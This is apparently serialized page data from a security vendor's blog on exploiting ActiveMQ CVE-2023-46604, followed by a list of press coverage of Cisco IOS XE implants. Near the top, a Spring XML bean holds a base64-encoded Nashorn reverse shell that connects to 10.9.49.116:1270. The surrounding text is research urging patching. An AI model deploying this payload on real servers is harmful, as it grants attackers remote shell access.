java.lang.String(java.util.Base64.decoder.decode("dmFyIHNoZWxsID0gImJhc2giOwppZiAoamF2YS5sYW5nLlN5c3RlbS5nZXRQcm9wZXJ0eSgib3MubmFtZSIpLmluZGV4T2YoIldpbmRvd3MiKSAhPSAtMSkgewoJc2hlbGwgPSAiY21kLmV4ZSI7Cn0KdmFyIHA9bmV3IGphdmEubGFuZy5Qcm9jZXNzQnVpbGRlcihzaGVsbCkucmVkaXJlY3RFcnJvclN0cmVhbSh0cnVlKS5zdGFydCgpO3ZhciBzPW5ldyBqYXZhLm5ldC5Tb2NrZXQoIjEwLjkuNDkuMTE2IiwgMTI3MCk7CnZhciBzb2NrZXRJbnB1dCA9IG5ldyBqYXZhLmlvLkJ1ZmZlcmVkUmVhZGVyKG5ldyBqYXZhLmlvLklucHV0U3RyZWFtUmVhZGVyKHMuZ2V0SW5wdXRTdHJlYW0oKSkpOwp2YXIgc29ja2V0T3V0cHV0ID0gbmV3IGphdmEuaW8uQnVmZmVyZWRXcml0ZXIobmV3IGphdmEuaW8uT3V0cHV0U3RyZWFtV3JpdGVyKHMuZ2V0T3V0cHV0U3RyZWFtKCkpKTsKdmFyIHByb2Nlc3NJbnB1dCA9IG5ldyBqYXZhLmlvLkJ1ZmZlcmVkV3JpdGVyKG5ldyBqYXZhLmlvLk91dHB1dFN0cmVhbVdyaXRlcihwLmdldE91dHB1dFN0cmVhbSgpKSk7CnZhciBwcm9jZXNzT3V0cHV0ID0gbmV3IGphdmEuaW8uQnVmZmVyZWRSZWFkZXIobmV3IGphdmEuaW8uSW5wdXRTdHJlYW1SZWFkZXIocC5nZXRJbnB1dFN0cmVhbSgpKSk7Cgp3aGlsZSAoIXMuaXNDbG9zZWQoKSkgewoJdmFyIGRhdGEKCWlmICgoZGF0YSA9IHNvY2tldElucHV0LnJlYWRMaW5lKCkpICE9IG51bGwpIHsKCQlwcm9jZXNzSW5wdXQud3JpdGUoZGF0YSArICJcbiIpOwoJCXByb2Nlc3NJbnB1dC5mbHVzaCgpCgl9CglqYXZhLmxhbmcuVGhyZWFkLnNsZWVwKDUwKTsKCgl3aGlsZSAocHJvY2Vzc091dHB1dC5yZWFkeSgpICYmIChkYXRhID0gcHJvY2Vzc091dHB1dC5yZWFkKCkpID4gMCkgewoJCQlzb2NrZXRPdXRwdXQud3JpdGUoZGF0YSk7Cgl9Cglzb2NrZXRPdXRwdXQuZmx1c2goKQoJdHJ5IHsKCQlwLmV4aXRWYWx1ZSgpOwoJCWJyZWFrOwoJfSBjYXRjaCAoZSkgewoJfQp9CgpwLmRlc3Ryb3koKTsKcy5jbG9zZSgpOw==")));')}\"\u002F>\n \u003C\u002Fbean>\n\u003C\u002Fbeans>\n",[886,85591,85592,85599,85612,85628,85641,85650,85678,85726,85734],{"__ignoreMap":219},[1373,85593,85594,85596],{"class":1375,"line":1376},[1373,85595,11852],{"class":1383},[1373,85597,85598],{"class":6300},"beans\n",[1373,85600,85601,85604,85606,85608,85610],{"class":1375,"line":220},[1373,85602,85603],{"class":8252}," xmlns",[1373,85605,5417],{"class":1383},[1373,85607,183],{"class":1387},[1373,85609,84909],{"class":1391},[1373,85611,19057],{"class":1387},[1373,85613,85614,85616,85618,85620,85622,85624,85626],{"class":1375,"line":1266},[1373,85615,85603],{"class":8252},[1373,85617,4606],{"class":51986},[1373,85619,84921],{"class":8252},[1373,85621,5417],{"class":1383},[1373,85623,183],{"class":1387},[1373,85625,84928],{"class":1391},[1373,85627,19057],{"class":1387},[1373,85629,85630,85633,85635,85637,85639],{"class":1375,"line":1852},[1373,85631,85632],{"class":8252}," xsi",[1373,85634,4606],{"class":51986},[1373,85636,84940],{"class":8252},[1373,85638,5417],{"class":1383},[1373,85640,19057],{"class":1387},[1373,85642,85643,85646,85648],{"class":1375,"line":4692},[1373,85644,85645],{"class":1391}," http:\u002F\u002Fwww.springframework.org\u002Fschema\u002Fbeans http:\u002F\u002Fwww.springframework.org\u002Fschema\u002Fbeans\u002Fspring-beans.xsd",[1373,85647,183],{"class":1387},[1373,85649,6765],{"class":1383},[1373,85651,85652,85654,85656,85658,85660,85662,85664,85666,85668,85670,85672,85674,85676],{"class":1375,"line":4724},[1373,85653,8246],{"class":1383},[1373,85655,84960],{"class":6300},[1373,85657,7911],{"class":8252},[1373,85659,5417],{"class":1383},[1373,85661,183],{"class":1387},[1373,85663,19383],{"class":1391},[1373,85665,183],{"class":1387},[1373,85667,27205],{"class":8252},[1373,85669,5417],{"class":1383},[1373,85671,183],{"class":1387},[1373,85673,85281],{"class":1391},[1373,85675,183],{"class":1387},[1373,85677,6765],{"class":1383},[1373,85679,85680,85682,85684,85686,85688,85690,85693,85695,85697,85699,85701,85704,85706,85708,85710,85713,85715,85717,85719,85722,85724],{"class":1375,"line":4756},[1373,85681,85290],{"class":1383},[1373,85683,85293],{"class":6300},[1373,85685,46496],{"class":8252},[1373,85687,5417],{"class":1383},[1373,85689,183],{"class":1387},[1373,85691,85692],{"class":1391},"file",[1373,85694,183],{"class":1387},[1373,85696,49451],{"class":8252},[1373,85698,5417],{"class":1383},[1373,85700,183],{"class":1387},[1373,85702,85703],{"class":1391},"#{''.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('Nashorn').eval('eval(new java.lang.String(java.util.Base64.decoder.decode(",[1373,85705,7218],{"class":7054},[1373,85707,85318],{"class":2209},[1373,85709,39663],{"class":7054},[1373,85711,85712],{"class":1391},"dmFyIHNoZWxsID0gImJhc2giOwppZiAoamF2YS5sYW5nLlN5c3RlbS5nZXRQcm9wZXJ0eSgib3MubmFtZSIpLmluZGV4T2YoIldpbmRvd3MiKSAhPSAtMSkgewoJc2hlbGwgPSAiY21kLmV4ZSI7Cn0KdmFyIHA9bmV3IGphdmEubGFuZy5Qcm9jZXNzQnVpbGRlcihzaGVsbCkucmVkaXJlY3RFcnJvclN0cmVhbSh0cnVlKS5zdGFydCgpO3ZhciBzPW5ldyBqYXZhLm5ldC5Tb2NrZXQoIjEwLjkuNDkuMTE2IiwgMTI3MCk7CnZhciBzb2NrZXRJbnB1dCA9IG5ldyBqYXZhLmlvLkJ1ZmZlcmVkUmVhZGVyKG5ldyBqYXZhLmlvLklucHV0U3RyZWFtUmVhZGVyKHMuZ2V0SW5wdXRTdHJlYW0oKSkpOwp2YXIgc29ja2V0T3V0cHV0ID0gbmV3IGphdmEuaW8uQnVmZmVyZWRXcml0ZXIobmV3IGphdmEuaW8uT3V0cHV0U3RyZWFtV3JpdGVyKHMuZ2V0T3V0cHV0U3RyZWFtKCkpKTsKdmFyIHByb2Nlc3NJbnB1dCA9IG5ldyBqYXZhLmlvLkJ1ZmZlcmVkV3JpdGVyKG5ldyBqYXZhLmlvLk91dHB1dFN0cmVhbVdyaXRlcihwLmdldE91dHB1dFN0cmVhbSgpKSk7CnZhciBwcm9jZXNzT3V0cHV0ID0gbmV3IGphdmEuaW8uQnVmZmVyZWRSZWFkZXIobmV3IGphdmEuaW8uSW5wdXRTdHJlYW1SZWFkZXIocC5nZXRJbnB1dFN0cmVhbSgpKSk7Cgp3aGlsZSAoIXMuaXNDbG9zZWQoKSkgewoJdmFyIGRhdGEKCWlmICgoZGF0YSA9IHNvY2tldElucHV0LnJlYWRMaW5lKCkpICE9IG51bGwpIHsKCQlwcm9jZXNzSW5wdXQud3JpdGUoZGF0YSArICJcbiIpOwoJCXByb2Nlc3NJbnB1dC5mbHVzaCgpCgl9CglqYXZhLmxhbmcuVGhyZWFkLnNsZWVwKDUwKTsKCgl3aGlsZSAocHJvY2Vzc091dHB1dC5yZWFkeSgpICYmIChkYXRhID0gcHJvY2Vzc091dHB1dC5yZWFkKCkpID4gMCkgewoJCQlzb2NrZXRPdXRwdXQud3JpdGUoZGF0YSk7Cgl9Cglzb2NrZXRPdXRwdXQuZmx1c2goKQoJdHJ5IHsKCQlwLmV4aXRWYWx1ZSgpOwoJCWJyZWFrOwoJfSBjYXRjaCAoZSkgewoJfQp9CgpwLmRlc3Ryb3koKTsKcy5jbG9zZSgpOw==",[1373,85714,7218],{"class":7054},[1373,85716,85318],{"class":2209},[1373,85718,39663],{"class":7054},[1373,85720,85721],{"class":1391},")));')}",[1373,85723,183],{"class":1387},[1373,85725,85355],{"class":1383},[1373,85727,85728,85730,85732],{"class":1375,"line":4768},[1373,85729,56557],{"class":1383},[1373,85731,84960],{"class":6300},[1373,85733,6765],{"class":1383},[1373,85735,85736,85738,85740],{"class":1375,"line":4792},[1373,85737,46627],{"class":1383},[1373,85739,84900],{"class":6300},[1373,85741,6765],{"class":1383},[61,85743,1903],{"id":1902},[18,85745,85746,85747,85752],{},"There are currently more than ",[47,85748,85751],{"href":85749,"rel":85750},"https:\u002F\u002Fsearch.censys.io\u002Fsearch?resource=hosts&sort=RELEVANCE&per_page=25&virtual_hosts=INCLUDE&q=services.extended_service_name%3D%22ACTIVEMQ%22",[51],"ten thousand"," of internet-facing ActiveMQ servers, and multiple organizations have reported ransomware attacks. Now that we know attackers can execute stealthy attacks using CVE-2023-46604, it’s become even more important to patch your ActiveMQ servers and, ideally, remove them from the internet entirely.",[61,85754,202],{"id":201},[18,85756,85757,85758,982,85761,63281,85764,982,85767,63288],{},"The VulnCheck Initial Access team is always looking to advance the state of attack on initial access vulnerabilities like CVE-2023-46604. For more research like this, see our blogs, ",[47,85759,40447],{"href":53829,"rel":85760},[51],[47,85762,35931],{"href":53837,"rel":85763},[51],[47,85765,1245],{"href":45535,"rel":85766},[51],[47,85768,216],{"href":214,"rel":85769},[51],[2901,85771,85772],{},"html pre.shiki code .swvn1, html code.shiki .swvn1{--shiki-light:#39ADB5;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .sHsBP, html code.shiki .sHsBP{--shiki-light:#E53935;--shiki-default:#22863A;--shiki-dark:#85E89D;--shiki-sepia:#F92672}html pre.shiki code .s_lYk, html code.shiki .s_lYk{--shiki-light:#9C3EDA;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .siCPE, html code.shiki .siCPE{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sLACW, html code.shiki .sLACW{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sRsjY, html code.shiki .sRsjY{--shiki-light:#39ADB5;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .ss--_, html code.shiki .ss--_{--shiki-light:#90A4AE;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html .light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html.light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html .sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html.sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html pre.shiki code .sMTiH, html code.shiki .sMTiH{--shiki-light:#39ADB5;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .sFhLe, html code.shiki .sFhLe{--shiki-light:#91B859;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .sGXK2, html code.shiki .sGXK2{--shiki-light:#39ADB5;--shiki-default:#D73A49;--shiki-dark:#F97583;--shiki-sepia:#F92672}html pre.shiki code .sD0ED, html code.shiki .sD0ED{--shiki-light:#6182B8;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .sYoWi, html code.shiki .sYoWi{--shiki-light:#E53935;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .srJo8, html code.shiki .srJo8{--shiki-light:#9C3EDA;--shiki-light-font-style:inherit;--shiki-default:#D73A49;--shiki-default-font-style:inherit;--shiki-dark:#F97583;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}",{"title":219,"searchDepth":220,"depth":220,"links":85774},[85775,85776,85777,85778,85779,85780],{"id":11647,"depth":220,"text":11648},{"id":84830,"depth":220,"text":84831},{"id":85166,"depth":220,"text":85167},{"id":85428,"depth":220,"text":85429},{"id":1902,"depth":220,"text":1903},{"id":201,"depth":220,"text":202},"VulnCheck finds a new way to exploit ActiveMQ CVE-2023-46604 that allows the attacker to hide in memory and avoid process-based detections.",{"slug":85783},"cve-2023-44604-activemq-in-memory","\u002Fblog\u002Fcve-2023-44604-activemq-in-memory",{"title":83349,"description":85781},"blog\u002Fcve-2023-44604-activemq-in-memory",[242],"Kj6_PNp3-YOymMlVUnRfTjpSnV0Q7JUxQHG9LchWzgA",{"id":85790,"title":83511,"articles":85791,"authors":85979,"body":85981,"date":85796,"description":86068,"extension":234,"image":7,"link":7,"meta":86069,"navigation":237,"path":86071,"seo":86072,"series":7,"stem":86073,"subtype":7,"tags":86074,"__hash__":86075},"blog\u002Fblog\u002Fcisco-implants.md",[85792,85797,85800,85803,85806,85809,85812,85815,85818,85822,85825,85828,85831,85834,85837,85839,85842,85845,85848,85851,85854,85857,85861,85863,85866,85869,85872,85875,85879,85882,85885,85888,85891,85894,85898,85902,85905,85908,85911,85915,85920,85923,85926,85929,85932,85936,85939,85943,85945,85948,85951,85955,85958,85961,85964,85968,85972,85975],{"title":85793,"source":85794,"link":85795,"date":85796},"“Cisco buried the lede.” >10,000 network devices backdoored through unpatched 0-day","Ars Technica","https:\u002F\u002Farstechnica.com\u002Fsecurity\u002F2023\u002F10\u002Factively-exploited-cisco-0-day-with-maximum-10-severity-gives-full-network-control\u002F","2023-10-17",{"title":85798,"source":19479,"link":85799,"date":85796},"Unpatched Zero-Day Being Exploited in the Wild, Cisco Warns","https:\u002F\u002Fwww.bankinfosecurity.com\u002Fcisco-warns-unpatched-0-day-being-exploited-in-wild-a-23336",{"title":85801,"source":14373,"link":85802,"date":85796},"Thousands of Cisco IOS XE devices hacked in widespread attacks","https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fthousands-of-cisco-ios-xe-devices-hacked-in-widespread-attacks\u002F#google_vignette",{"title":85798,"source":85804,"link":85805,"date":85796},"Careers Info Security","https:\u002F\u002Fwww.careersinfosecurity.com\u002Funpatched-zero-day-being-exploited-in-wild-cisco-warns-a-23336",{"title":85798,"source":85807,"link":85808,"date":85796},"Careers Info Security Asia","https:\u002F\u002Fwww.careersinfosecurity.asia\u002Funpatched-zero-day-being-exploited-in-wild-cisco-warns-a-23336",{"title":85798,"source":85810,"link":85811,"date":85796},"Careers Info Security EU","https:\u002F\u002Fwww.careersinfosecurity.eu\u002Funpatched-zero-day-being-exploited-in-wild-cisco-warns-a-23336",{"title":85798,"source":85813,"link":85814,"date":85796},"Careers Info Security India","https:\u002F\u002Fwww.careersinfosecurity.in\u002Funpatched-zero-day-being-exploited-in-wild-cisco-warns-a-23336",{"title":85798,"source":85816,"link":85817,"date":85796},"Careers Info Security UK","https:\u002F\u002Fwww.careersinfosecurity.co.uk\u002Funpatched-zero-day-being-exploited-in-wild-cisco-warns-a-23336",{"title":85819,"source":85820,"link":85821,"date":85796},"Cisco IOS XE Devices Have Been ‘Widely Exploited:’ Researcher","CRN","https:\u002F\u002Fwww.crn.com\u002Fnews\u002Fsecurity\u002Fcisco-ios-xe-devices-have-been-widely-exploited-researcher",{"title":85823,"source":85820,"link":85824,"date":85796},"Why Cisco IOS XE Attacks Are Setting Off Alarm Bells","https:\u002F\u002Fwww.crn.com\u002Fnews\u002Fsecurity\u002Fwhy-cisco-ios-xe-attacks-are-setting-off-alarm-bells",{"title":85798,"source":85826,"link":85827,"date":85796},"CU Info Security","https:\u002F\u002Fwww.cuinfosecurity.com\u002Funpatched-zero-day-being-exploited-in-wild-cisco-warns-a-23336",{"title":85829,"source":10841,"link":85830,"date":85796},"Cisco’s critical IOS XE software zero day is a ‘bad situation’","https:\u002F\u002Fwww.cybersecuritydive.com\u002Fnews\u002Fciscos-critical-ios-xe-zero-day\u002F696791\u002F",{"title":85832,"source":11218,"link":85833,"date":85796},"Zero-Day Alert: Thousands of Cisco IOS XE Systems Now Compromised","https:\u002F\u002Fwww.darkreading.com\u002Fattacks-breaches\u002Ften-thousand-cisco-ios-xe-systems-compromised-zero-day-bug",{"title":85798,"source":85835,"link":85836,"date":85796},"Data Breach Today","https:\u002F\u002Fwww.databreachtoday.co.uk\u002Funpatched-zero-day-being-exploited-in-wild-cisco-warns-a-23336",{"title":85798,"source":85838,"link":85836,"date":85796},"Data Breach Today UK",{"title":85798,"source":85840,"link":85841,"date":85796},"Gov Info Security","https:\u002F\u002Fwww.govinfosecurity.com\u002Funpatched-zero-day-being-exploited-in-wild-cisco-warns-a-23336",{"title":85798,"source":85843,"link":85844,"date":85796},"Healthcare Info Security","https:\u002F\u002Fwww.healthcareinfosecurity.com\u002Funpatched-zero-day-being-exploited-in-wild-cisco-warns-a-23336",{"title":85846,"source":84069,"link":85847,"date":85796},"Cisco IOS XE zero-day exploited by attackers to deliver implant (CVE-2023-20198)","https:\u002F\u002Fwww.helpnetsecurity.com\u002F2023\u002F10\u002F16\u002Fcve-2023-20198\u002F",{"title":85798,"source":85849,"link":85850,"date":85796},"Info Risk Today","https:\u002F\u002Fwww.inforisktoday.com\u002Funpatched-zero-day-being-exploited-in-wild-cisco-warns-a-23336",{"title":85798,"source":85852,"link":85853,"date":85796},"Info Risk Today Asia","https:\u002F\u002Fwww.inforisktoday.asia\u002Funpatched-zero-day-being-exploited-in-wild-cisco-warns-a-23336",{"title":85798,"source":85855,"link":85856,"date":85796},"Info Risk Today UK","https:\u002F\u002Fwww.inforisktoday.co.uk\u002Funpatched-zero-day-being-exploited-in-wild-cisco-warns-a-23336",{"title":85858,"source":85859,"link":85860,"date":85796},"Critical Flaw Leads Hackers to Hijack Thousands of Cisco Devices","PC Mag","https:\u002F\u002Fwww.pcmag.com\u002Fnews\u002Fcritical-flaw-leads-hackers-to-hijack-thousands-of-cisco-devices",{"title":85858,"source":85862,"link":85860,"date":85796},"PC Mag UK",{"title":85864,"source":14390,"link":85865,"date":85796},"CVE-2023-20198 ZERO-DAY WIDELY EXPLOITED TO INSTALL IMPLANTS ON CISCO IOS XE SYSTEMS","https:\u002F\u002Fsecurityaffairs.com\u002F152626\u002Fhacking\u002Fcve-2023-20198-cisco-ios-xe-devices.html",{"title":85867,"source":12162,"link":85868,"date":85796},"Cisco IOS XE zero-day facing mass exploitation","https:\u002F\u002Fwww.techtarget.com\u002Fsearchsecurity\u002Fnews\u002F366555683\u002FCisco-IOS-XE-zero-day-facing-mass-exploitation",{"title":85870,"source":39566,"link":85871,"date":85796},"Spyware in bogus RedAlert app. Cyberespionage against ASEAN. Cisco 0-day exploited. Security-by-design. Cyber ops in Russia's hybrid war.","https:\u002F\u002Fthecyberwire.com\u002Fnewsletters\u002Fdaily-briefing\u002F12\u002F198",{"title":85873,"source":14382,"link":85874,"date":85796},"Warning: Unpatched Cisco Zero-Day Vulnerability Actively Targeted in the Wild","https:\u002F\u002Fthehackernews.com\u002F2023\u002F10\u002Fwarning-unpatched-cisco-zero-day.html",{"title":85876,"source":73072,"link":85877,"date":85878},"Cyber Security Headlines: Zero-day attacks affect 10,000 Cisco devices","https:\u002F\u002Fcisoseries.com\u002Fcyber-security-headlines-zero-day-attacks-affect-10000-cisco-devices-us-government-warns-of-confluence-vuln-exploitation-d-link-confirms-data-breach\u002F","2023-10-18",{"title":85880,"source":85820,"link":85881,"date":85878},"More Than 34,000 Cisco Devices Compromised Via IOS XE Vulnerability: Researchers","https:\u002F\u002Fwww.crn.com\u002Fnews\u002Fsecurity\u002Fmore-than-34-000-cisco-devices-compromised-via-ios-xe-vulnerability-researchers",{"title":85883,"source":11228,"link":85884,"date":85878},"Unidentified attackers breach tens of thousands of Cisco devices","https:\u002F\u002Fcyberscoop.com\u002Fcisco-devices-breach-ios-xe\u002F",{"title":85832,"source":85886,"link":85887,"date":85878},"Network Computing","https:\u002F\u002Fwww.networkcomputing.com\u002Fnetwork-security\u002Fzero-day-alert-thousands-cisco-ios-xe-systems-now-compromised",{"title":85889,"source":61436,"link":85890,"date":85878},"Risky Biz News: Mysterious APT compromises Asian government's secure USBs","https:\u002F\u002Friskybiznews.substack.com\u002Fp\u002Fmysterious-apt-compromises-secure-usbs?utm_source=post-email-title&publication_id=852612&post_id=138055094&utm_campaign=email-post-title&isFreemail=true&r=2rnh0k&utm_medium=email",{"title":85892,"source":14378,"link":85893,"date":85878},"Tens of Thousands of Cisco Devices Hacked via Zero-Day Vulnerability","https:\u002F\u002Fwww.securityweek.com\u002Ftens-of-thousands-of-cisco-devices-hacked-via-zero-day-vulnerability\u002F",{"title":85895,"source":85896,"link":85897,"date":85878},"Notes from the cyber phases of two hybrid wars. Alerts on Cisco, Atlassian vulnerability exploitation. Updated guidance on security by design.","The Cyberwire","https:\u002F\u002Fthecyberwire.com\u002Fpodcasts\u002Fdaily-podcast\u002F1928\u002Fnotes",{"title":85899,"source":3500,"link":85900,"date":85901},"Fears grow over extent of Cisco IOS XE zero-day","https:\u002F\u002Fwww.computerweekly.com\u002Fnews\u002F366556337\u002FFears-grow-over-extent-of-Cisco-IOS-XE-zero-day","2023-10-19",{"title":85903,"source":85820,"link":85904,"date":85901},"Cisco IOS XE Hack: Researchers Find Another ‘Sharp Increase’ In Affected Devices","https:\u002F\u002Fwww.crn.com\u002Fnews\u002Fsecurity\u002Fcisco-ios-xe-hack-researchers-find-another-sharp-increase-in-affected-devices",{"title":85906,"source":23286,"link":85907,"date":85901},"Cisco IOS XE Web UI Vulnerability: A Glimpse into CVE-2023-20198","https:\u002F\u002Fsecurityboulevard.com\u002F2023\u002F10\u002Fcisco-ios-xe-web-ui-vulnerability-a-glimpse-into-cve-2023-20198\u002F",{"title":85909,"source":60939,"link":85910,"date":85901},"Number of Cisco Devices Hacked via Unpatched Vulnerability Increases to 40,000","https:\u002F\u002Fwww.securityweek.com\u002Fnumber-of-cisco-devices-hacked-via-unpatched-vulnerability-increases-to-40000\u002F",{"title":85912,"source":85913,"link":85914,"date":85901},"More than 40,000 Cisco switches and routers could be infected","The Washington Post","https:\u002F\u002Fwww.washingtonpost.com\u002Fpolitics\u002F2023\u002F10\u002F19\u002Fmore-than-40000-cisco-switches-routers-could-be-infected\u002F",{"title":85916,"source":85917,"link":85918,"date":85919},"Patch Coming for Cisco IOS XE Software Vulnerabilities, Exploitations Mount","Channel Features","https:\u002F\u002Fwww.channelfutures.com\u002Fsecurity\u002Fpatch-coming-for-cisco-ios-xe-software-vulnerabilities-exploitations-mount","2023-10-20",{"title":85921,"source":73072,"link":85922,"date":85919},"Cyber Security Headlines Week in Review: Water cyber-regs rescinded, Cisco zero-day attacks, Signal debunks zero-day","https:\u002F\u002Fcisoseries.com\u002Fcyber-security-headlines-week-in-review-water-cyber-regs-rescinded-cisco-zero-day-attacks-signal-debunks-zero-day\u002F",{"title":85924,"source":14390,"link":85925,"date":85919},"CISA ADDS CISCO IOS XE FLAW TO ITS KNOWN EXPLOITED VULNERABILITIES CATALOG","https:\u002F\u002Fsecurityaffairs.com\u002F152763\u002Fhacking\u002Fcisa-adds-cisco-ios-xe-flaw-known-exploited-vulnerabilities-catalog.html",{"title":85927,"source":14390,"link":85928,"date":85919},"TENS OF THOUSANDS CISCO IOS XE DEVICES WERE HACKED BY EXPLOITING CVE-2023-20198","https:\u002F\u002Fsecurityaffairs.com\u002F152744\u002Fhacking\u002Fcisco-ios-xe-attacks-cve-2023-20198.html",{"title":85930,"source":65365,"link":85931,"date":85919},"Cisco identifies another IOS XE vulnerability, with patches coming this weekend","https:\u002F\u002Ftherecord.media\u002Fcisco-ios-xe-vulnerability-patches-coming",{"title":85933,"source":14373,"link":85934,"date":85935},"Cisco discloses new IOS XE zero-day exploited to deploy malware implant","https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fcisco-discloses-new-ios-xe-zero-day-exploited-to-deploy-malware-implant\u002F#google_vignette","2023-10-23",{"title":85937,"source":11218,"link":85938,"date":85935},"Cyberattackers Alter Implant on 30K Compromised Cisco IOS XE Devices","https:\u002F\u002Fwww.darkreading.com\u002Fremote-workforce\u002Fcyberattackers-alter-implant-30k-compromised-cisco-ios-xe-devices",{"title":85940,"source":85941,"link":85942,"date":85935},"Group Behind Cisco Device Hijackings Changes Tactics to Evade Detection","PCMag","https:\u002F\u002Fwww.pcmag.com\u002Fnews\u002Fgroup-behind-cisco-device-hijackings-changes-tactics-to-evade-detection",{"title":85940,"source":85944,"link":85942,"date":85935},"PCMag UK",{"title":85946,"source":14390,"link":85947,"date":85935},"CISCO WARNS OF A SECOND IOS XE ZERO-DAY USED TO INFECT DEVICES WORLDWIDE","https:\u002F\u002Fsecurityaffairs.com\u002F152924\u002Fhacking\u002Fcisco-ios-xe-zero-day-cve-2023-20273.html",{"title":85949,"source":3481,"link":85950,"date":85935},"Cisco fixes critical IOS XE bug but malware crew way ahead of them","https:\u002F\u002Fwww.theregister.com\u002F2023\u002F10\u002F23\u002Fcisco_iosxe_fix\u002F",{"title":85952,"source":19479,"link":85953,"date":85954},"Count of Hacked Cisco IOS XE Devices Unexpectedly Plummets","https:\u002F\u002Fwww.bankinfosecurity.com\u002Fcount-hacked-cisco-ios-xe-devices-unexpectedly-plummets-a-23371","2023-10-24",{"title":85956,"source":14378,"link":85957,"date":85954},"Number of Cisco Devices Hacked via Zero-Day Remains High as Attackers Update Implant","https:\u002F\u002Fwww.securityweek.com\u002Fnumber-of-cisco-devices-hacked-via-zero-day-remains-high-as-attackers-update-implant\u002F",{"title":85959,"source":14382,"link":85960,"date":85954},"Backdoor Implant on Hacked Cisco Devices Modified to Evade Detection","https:\u002F\u002Fthehackernews.com\u002F2023\u002F10\u002Fbackdoor-implant-on-hacked-cisco.html",{"title":85962,"source":12162,"link":85963,"date":61851},"Cisco IOS XE instances still under attack, patch now","https:\u002F\u002Fwww.techtarget.com\u002Fsearchsecurity\u002Fnews\u002F366556900\u002FCisco-IOS-XE-instances-still-under-attack-patch-now",{"title":85965,"source":14390,"link":85966,"date":85967},"EXPERTS RELEASED POC EXPLOIT CODE FOR CISCO IOS XE FLAW CVE-2023-20198","https:\u002F\u002Fsecurityaffairs.com\u002F153285\u002Fhacking\u002Fcisco-ios-xe-cve-2023-20198-poc.html","2023-10-31",{"title":85969,"source":73125,"link":85970,"date":85971},"10 of the biggest zero-day attacks of 2023","https:\u002F\u002Fwww.techtarget.com\u002Fsearchsecurity\u002Ffeature\u002F10-of-the-biggest-zero-day-attacks-of-2023","2024-01-04",{"title":85973,"source":14386,"link":85974,"date":69142},"Cisco VPN Routers Flaw Let Attackers Execute Remote Code","https:\u002F\u002Fcybersecuritynews.com\u002Fcisco-vpn-routers-flaw\u002F",{"title":85976,"source":85794,"link":85977,"date":85978},"Canadian telecom hacked by suspected China state group","https:\u002F\u002Farstechnica.com\u002Fsecurity\u002F2025\u002F06\u002Fsuspected-china-state-hackers-exploited-patched-flaw-to-breach-canadian-telecom\u002F","2025-06-23",[85980],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":85982,"toc":86066},[85983,85986,85998,86024,86035,86042,86048,86051,86063],[263,85984],{":list":85985,"ico":266,"title":83511},"[\"CVE-2023-20198 appears to have been widely exploited to install implants on Cisco IOS XE systems.\",\"VulnCheck performed an internet scan and found thousands of implanted hosts.\",\"VulnCheck released a scanner to detect the implant on affected devices.\"]",[18,85987,85988,85989,85993,85994,85997],{},"On October 16, 2023 Cisco ",[47,85990,12291],{"href":85991,"rel":85992},"https:\u002F\u002Fsec.cloudapps.cisco.com\u002Fsecurity\u002Fcenter\u002Fcontent\u002FCiscoSecurityAdvisory\u002Fcisco-sa-iosxe-webui-privesc-j22SaA4z",[51]," an authentication bypass, ",[47,85995,61831],{"href":83884,"rel":85996},[51],", affecting Cisco IOS XE. The disclosure reported that the vulnerability had been exploited in the wild to help install implants on affected switches and routers. Additionally, Cisco shared a simple technique to determine if an IOS XE device had an active implant on it. The implant responds with an 18-character hexadecimal string when a specific HTTP POST is sent to the system:",[1354,85999,86001],{"className":31740,"code":86000,"language":2186,"meta":219,"style":219},"$ curl -X POST 